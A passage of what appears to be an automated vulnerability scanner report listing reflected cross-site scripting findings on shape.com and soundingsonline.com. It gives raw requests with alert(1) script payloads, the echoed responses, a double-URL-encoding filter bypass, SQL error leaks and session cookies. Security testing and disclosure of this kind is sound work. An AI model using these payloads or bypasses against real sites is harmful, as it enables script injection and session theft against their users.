Vary: User-Agent
Content-Length: 4014
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<form name="Mail" enctype="multipart/form-data" method="post" action="/article_submission.php/8fdb2"><script>alert(1)</script>eff65952e99">
...[SNIP]...

4.1364. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10ba7<script>alert(1)</script>027582b0bfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts10ba7<script>alert(1)</script>027582b0bfb/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:22 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922622"
Last-Modified: Tue, 25 Jan 2011 02:30:22 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts10ba7<script>alert(1)</script>027582b0bfb/articles/blood-sugar.html </div>
...[SNIP]...

4.1365. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e81cc<script>alert(1)</script>2f2a9ded22f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articlese81cc<script>alert(1)</script>2f2a9ded22f/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:47 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922647"
Last-Modified: Tue, 25 Jan 2011 02:30:47 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articlese81cc<script>alert(1)</script>2f2a9ded22f/blood-sugar.html </div>
...[SNIP]...

4.1366. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6ed33<script>alert(1)</script>6dc486f4e04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/blood_sugar.html6ed33<script>alert(1)</script>6dc486f4e04 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:31:19 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922679"
Last-Modified: Tue, 25 Jan 2011 02:31:19 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/blood-sugar.html6ed33<script>alert(1)</script>6dc486f4e04 </div>
...[SNIP]...

4.1367. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b6e7<script>alert(1)</script>7501bcb859 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts6b6e7<script>alert(1)</script>7501bcb859/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:14 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922614"
Last-Modified: Tue, 25 Jan 2011 02:30:14 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close
Content-Length: 27354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts6b6e7<script>alert(1)</script>7501bcb859/articles/workout-schedule.html </div>
...[SNIP]...

4.1368. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42a76<script>alert(1)</script>719a71fabf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles42a76<script>alert(1)</script>719a71fabf5/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:30:47 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922647"
Last-Modified: Tue, 25 Jan 2011 02:30:47 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close
Content-Length: 27356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles42a76<script>alert(1)</script>719a71fabf5/workout-schedule.html </div>
...[SNIP]...

4.1369. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f9e83<script>alert(1)</script>d9fcde00515 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/workout_schedule.htmlf9e83<script>alert(1)</script>d9fcde00515 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:31:24 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1295922684"
Last-Modified: Tue, 25 Jan 2011 02:31:24 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 27356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/workout-schedule.htmlf9e83<script>alert(1)</script>d9fcde00515 </div>
...[SNIP]...

4.1370. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 755fe"><script>alert(1)</script>b97b88a4df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /about-us?755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/about-us?755fe"><script>alert(1)</script>b97b88a4df6=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1371. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3409"><script>alert(1)</script>2e24591c134 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /advertise?a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/advertise?a3409"><script>alert(1)</script>2e24591c134=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1372. http://www.soundingsonline.com/archives ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The value of the '"--></style></script><script>alert(0x001E2B)</script> request parameter is copied into the HTML document as plain text between tags. The payload c4e94<a>353682fa55e was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>c4e94<a>353682fa55e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=jfj578l38bjt9jl82m4g7tr920; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>c4e94<a>353682fa55e' AND co' at line 1</font>
...[SNIP]...

4.1373. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a4f6<a>1bd7300bcc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>&9a4f6<a>1bd7300bcc0=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=0mofbqpbltb8gduh5me9ne6ql3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>&9a4f6<a>1bd7300bcc0=1' AND' at line 1</font>
...[SNIP]...

4.1374. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa446"><script>alert(1)</script>bb3bb3a680e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop?aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop?aa446"><script>alert(1)</script>bb3bb3a680e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1375. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 777a1"><script>alert(1)</script>1d991553d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/know-how?777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/know-how?777a1"><script>alert(1)</script>1d991553d87=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1376. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1582c"><script>alert(1)</script>430c4650db4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/new-boats?1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

4.1377. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1f05"><script>alert(1)</script>10548a0b938 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/new-gear?e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-gear?e1f05"><script>alert(1)</script>10548a0b938=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1378. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92b7d"><script>alert(1)</script>e206520e3f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

